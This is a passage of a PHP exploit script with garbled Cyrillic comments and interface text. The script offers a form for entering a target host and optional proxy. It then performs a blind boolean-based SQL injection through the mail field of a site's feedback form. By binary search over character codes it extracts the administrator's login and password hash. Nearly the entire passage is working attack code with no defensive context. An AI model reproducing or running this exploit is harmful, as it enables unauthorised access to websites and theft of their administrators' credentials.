$value){ if(!empty($key)&&!empty($value))$tmp[$key]=$value; } if(!empty($post))$header="POST ".$set["patch"].$patch.'?'.$get." HTTP/1.0\r\n"; else $header="GET ".$set["patch"].$patch.'?'.$get." HTTP/1.0\r\n"; foreach($tmp as $key => $value){ if(!empty($key)&&!empty($value))$header.=$key.': '.$value."\r\n"; } $header.="\r\n"; if(!empty($post))$header.=$post; return $header; } //������� ��� ������� ������ ������� //��� � ����������� ������ ����� ������ ������. function send_packet($packet){ global $set; if($set['uproxy'])$fp=@fsockopen($set['phost'],$set['pport']); else $fp=@fsockopen($set['host'],80); if($fp){ fwrite($fp,$packet); $dt=''; while(!feof($fp)){ $dt.=fgets($fp); if(strpos($dt,'
  • �� ��������� ����'))return $dt; } fclose($fp); }else return false; return $dt; } //"������������" ������� ������ function logg($str,$type='1'){//1 - "[+]", 2 - "[-]", 3 - "[*]", 4 - "" if(($type<4)&&($type>0)){ $z=array('+','-','*'); $ret='['.$z[$type-1].'] '.$str."\r\n"; }else $ret=$str; $ret.="
    \r\n"; echo($ret); flush(); } function send_sql($sql,$pos,$znak,$ascii,$max,$type='sumb'){ if($znak=='='){ if($type=='sumb')$tmp="1' AND 1=IF(ASCII(SUBSTRING((".$sql."),".$pos.",1))=".$ascii.",1,0) -- d"; else $tmp="1' AND 1=IF(LENGTH((".$sql."))=".$ascii.",1,0) -- d"; }else{ if($type=='sumb')$tmp="1' AND 1=IF(ASCII(SUBSTRING((".$sql."),".$pos.",1)) BETWEEN ".$ascii." AND ".$max.",1,0) -- d"; else $tmp="1' AND 1=IF(LENGTH((".$sql.")) BETWEEN ".$ascii." AND ".$max.",1,0) -- d"; } $tmp=urlencode($tmp); $tmp=create_packet('feedback/','','text=1&user;_mail=ddd@dd.dd&mail;='.$tmp); $tmp=send_packet($tmp); if(strpos($tmp,'
  • �� ������ ��������������'))return false; else return true; } function get_sumbol($sql,$pos){ global $set,$stat; $min=0; $max=255; $znak='>'; $i2=0; $ascii=0; for($i=0;$i<20;$i++){ if(($max-$min)>3){ $sred=round(($min+$max)/2); }else{ if($min>$max)break; $sred=$min+$i2; $znak='='; $i2++; } $tmp=send_sql($sql,$pos,$znak,$sred,$max); if($tmp){ if($znak=='='){ $ascii=$sred; break; }else $min=$sred; }else{ $max=$sred; } } return chr($ascii); } function get_cnt($sql){ $min=0; $max=1024; $znak='>'; $i2=0; $ascii=0; for($i=0;$i<20;$i++){ if(($max-$min)>3){ $sred=round(($min+$max)/2); }else{ if($min>$max)break; $sred=$min+$i2; $znak='='; $i2++; } $tmp=send_sql($sql,'',$znak,$sred,$max,'ln'); if($tmp){ if($znak=='='){ $ascii=$sred; break; }else $max=$max*2; $min=$sred; }else{ $max=$sred; } } return $ascii; } //������ ������ ��������� ������ if(!@set_time_limit(0)){ if(@function_exists('ini_set'))@ini_set('max_execution_time',0); elseif(@function_exists('ini_alter'))@ini_alter('max_execution_time',0); else die('Can not set_time_limit(0)'); if(@function_exists('ini_get')){ if(@ini_get('max_execution_time')!='0')die('Can not set_time_limit(0)'); }else echo('Maybe can not set_time_limit(0)'); } //���������� ������� ���������� ������ ������� ����������� ����� �� ������� if(@function_exists('ignore_user_abort')){ @ignore_user_abort(true); if(@ignore_user_abort()!=1)die('Can not set ignore_user_abort=true'); }else die('Can not set ignore_user_abort=true'); //������ ��������� echo('

    '.$exp['tpbg'].' Exploit For '.$exp['scvn'].'
    ��� & ��������: '.$exp['athr'].'

    '."\r\n"); //��������� if(!empty($_POST['type'])){ $error=''; //���� if(!empty($_POST['host']))$set['host']=trim($_POST['host']); else $error.='���������� ������� ���� � '.$exp['shvn'].'
    '."\r\n"; //���� �� ������� �� ����� if(!empty($_POST['patch'])){ $set['patch']=trim($_POST['patch']); if(empty($set['patch']))$set['patch']='/'; if(substr($set['patch'],0,1)!='/')$set['patch']='/'.$set['patch']; if(substr($set['patch'],strlen($set['patch'])-1,1)!='/')$set['patch']=$set['patch'].'/'; }else $set['patch']='/'; //�������� ����� ������������ ������ ����� ������ ������ if((!empty($_POST['uprox']))&&($_POST['uprox']==='us')){ $set['uproxy']=true; //����� ������ ������� if(!empty($_POST['proxy']))$set['phost']=$_POST['proxy']; else $error.='���������� ������� ����� ������ �������
    '."\r\n"; //���� ������ if(!empty($_POST['pport'])){ if((!preg_match('/^[0-9]+$/',$_POST['pport']))||($_POST['pport']>65536))$error.='�������� ���� ������ �������
    '."\r\n"; else $set['pport']=$_POST['pport']; }else $error.='���������� ������� ���� ������ �������
    '."\r\n"; }else $set['uproxy']=false; } //��������� if((empty($_POST['type']))||(!empty($error))){ //���� ���� ������ ��� ��������� �������� �� �� ������� if(!empty($error))echo($error.'
    '); echo('
    �����:'.$exp['need'].'


    ����:
    ����:
    ����� ������:�� ���
    ����� ������:
    ���� ������:




    © '.$exp['copy'].'
    '); die(); } logg('

    ',4); logg('����� ��������� '.$set['host'].$set['patch'].'',3); logg('�������� ����������...',3); if(($tmp=get_cnt("SELECT CONCAT(user_login,0x3a,user_password) FROM expl_users WHERE user_id=1"))>0){ logg('������� ���� ������!'); logg('���������� ���������� �������� '.$tmp.'',3); logg('�������� �������� ������...',3); $str=''; for($i=1;$i<=$tmp;$i++){ $str.=get_sumbol("SELECT CONCAT(user_login,0x3a,user_password) FROM expl_users WHERE user_id=1",$i); } $tmp=explode(':',$str,2); logg('�����: '.$tmp[0].''); logg('���: '.$tmp[1].''); logg('������',3); }else{ logg('������� ���� �� ������...',2); } logg('

    © '.$exp['copy'].'
    ',4); ?>